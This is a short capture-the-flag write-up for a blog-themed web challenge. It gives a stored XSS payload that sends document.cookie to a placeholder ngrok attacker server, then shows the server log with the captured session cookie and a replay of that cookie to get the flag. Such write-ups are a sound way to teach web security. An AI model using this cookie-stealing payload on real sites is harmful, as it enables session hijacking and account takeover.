Description

If you love Star Wars as much as I do you need to check out this blog!

Solution

Can't create an account or sign up as admin.

Register as cat and find a guestbook, provide XSS payload to steal cookie.

<script>new Image().src='http://ATTACKER_SERVER.ngrok-free.app?c='+document.cookie</script>

Request is made to our server containing cookies, including a JWT

127.0.0.1 - - [15/Jun/2023 23:09:24] "GET /?c=ss_cvr=3ad69c49-d9aa-4fb0-b6f1-5c38324adf3b|1686862282337|1686862282337|1686862282337|1;%20x-wing=eyJfcGVybWFuZW50Ijp0cnVlLCJpZCI6MX0.ZIuMEw.0OSvB-AGOciNuH-n824cnC9uTFE HTTP/1.1" 200 -

We replace the session cookie with eyJfcGVybWFuZW50Ijp0cnVlLCJpZCI6MX0.ZIuMEw.0OSvB-AGOciNuH-n824cnC9uTFE and receive a flag!

flag{a538c88890d45a382e44dfd00296a99b}

Original writeup (https://github.com/Crypto-Cat/CTF/blob/main/ctf_events/nahamcon_23/web/star_wars.md).